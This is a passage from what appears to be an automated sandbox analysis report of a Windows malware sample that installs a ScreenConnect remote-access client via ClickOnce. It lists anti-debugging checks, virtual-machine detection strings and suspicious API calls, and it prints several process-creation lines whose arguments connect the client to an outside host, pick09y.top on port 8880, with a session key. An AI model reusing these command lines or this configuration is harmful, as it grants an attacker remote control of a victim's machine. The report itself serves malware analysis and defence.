                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54A4B FindFirstFileExA,0_2_00F54A4B
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\Jump to behavior
                  Source: Amcache.hve.12.drBinary or memory string: VMware
                  Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: svchost.exe, 0000000D.00000003.2614693181.000001D225264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTcpV6VMWare
                  Source: dfsvc.exe, 00000001.00000002.3917547466.0000023571773000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3912001383.000002356F390000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3751190494.00000133B0C57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3748015420.00000133AB42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886697449.000001D22422B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3886580352.00000000008B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F54573
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F53677 mov eax, dword ptr fs:[00000030h]0_2_00F53677
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F56893 GetProcessHeap,0_2_00F56893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F51493
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F54573
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F5191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5191F
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51AAC SetUnhandledExceptionFilter,0_2_00F51AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\c33t3yqg.mwr\be27gn6q.q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\c33t3yqg.mwr\be27gn6q.q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\c33t3yqg.mwr\be27gn6q.q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\screenconnect.clientservice.exe" "?e=support&y=guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=bgiaaackaabsu0exaagaaaeaaqddgakam2sc4a%2b0vjsnximnzoex5mkrna0gdqvtzfuyhui4mxfaier02wciarvbkqtcbocnzy6cohwlxqtjbxchk5v9nclpcj0vsmvq5ngzm5kwtjoirlp48nx7xw8h5tmli69zhw7bdotif1%2bzod8%2bp9ttrfgxjhbbseiblgi17jx%2ffgldqyfbxwovwjyusfapm2b6yerofjh%2b%2fcllgayedlbz3cjwk2rkmq6rxdojaigyxzfrbilrifetmhax7zlc%2fb3uiiepox2rwmozfqlj%2bubobd89ykn0ubh3alvd%2b8orlqspyebcok4rg%2fouoyveicokqxda0lwuzw70luvi&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51BD4 cpuid 0_2_00F51BD4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformationJump to behavior
